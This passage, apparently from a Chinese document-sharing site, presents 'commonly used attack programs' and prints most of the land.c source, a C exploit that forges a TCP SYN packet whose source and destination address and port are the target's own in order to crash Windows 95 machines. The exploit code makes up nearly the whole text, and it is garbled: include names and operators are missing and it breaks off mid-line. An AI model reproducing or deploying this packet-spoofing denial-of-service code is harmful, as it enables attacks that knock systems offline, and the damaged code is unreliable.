c语言以常用的攻击软件源代码.docVIP

c语言以前常用的攻击软件源代码 常用攻击程序 Abstract 这里有一些是老的，现在看来并没有用，但他们都很有名。 1 Land 攻击一台Win95的机器。这是Win95的一个漏洞，以其IP地址和端口向自 己的同一个端口发起连接（发SYN），Win95即会崩溃。 /* land.c by m3lt, FLC crashes a win95 box */ #include #include #include #include #include #include #include #include //用于TCP校验和的伪头 struct pseudohdr { struct in_addr saddr; struct in_addr daddr; u_char zero; u_char protocol; u_short length; struct tcphdr tcpheader; }; //计算IP校验和 u_short checksum(u_short * data,u_short length) { register long value; u_short i; for(i=0;i(length1);i++) value+=data[i]; if((length1)==1) value+=(data[i]8); value=(value65535)+(value16); return(~value); } int main(int argc,char * * argv) { struct sockaddr_in sin; struct hostent * hoste; int sock; char buffer[40]; struct iphdr * ipheader=(struct iphdr *) buffer; struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct iphdr)); struct pseudohdr pseudoheader; fprintf(stderr,land.c by m3lt, FLC\n); if(argc3) { fprintf(stderr,usage: %s IP port\n,argv[0]); return(-1); } bzero(sin,sizeof(struct sockaddr_in)); sin.sin_family=AF_INET; if((hoste=gethostbyname(argv[1]))!=NULL) bcopy(hoste-h_addr,sin.sin_addr,hoste-h_length); else if((sin.sin_addr.s_addr=inet_addr(argv[1]))==-1) { fprintf(stderr,unknown host %s\n,argv[1]); return(-1); } if((sin.sin_port=htons(atoi(argv[2])))==0) { fprintf(stderr,unknown port %s\n,argv[2]); return(-1); } //new一个SOCK—RAW以发伪造IP包 这需要root权限 if((sock=socket(AF_INET,SOCK_RAW,255))==-1) { fprintf(stderr,couldnt allocate raw socket\n); return(-1); } bzero(buffer,sizeof(struct iphdr)+sizeof(struct tcphdr)); ipheader-version=4; ipheader-ihl=sizeof(struct iphdr)/4; ipheader-tot_len=htons(sizeof(struct iphdr)+sizeof(struct tcphdr)); ipheader-id=htons(0xF1C); ipheader-ttl=255; ipheader-protocol=IP_TCP; //目的IP地址和源IP地址相同 ipheader-saddr=sin.sin_addr.s_addr; ipheader-daddr=sin.sin_addr.s_addr; //目的TCP端口和源TCPIP端口相同 tcpheader-th_sport=sin.sin_port; tcpheader-th_dport=sin.sin_port; tcpheader-th_seq=htonl(0xF1C); tcpheader-th_flags=TH_SYN; tcp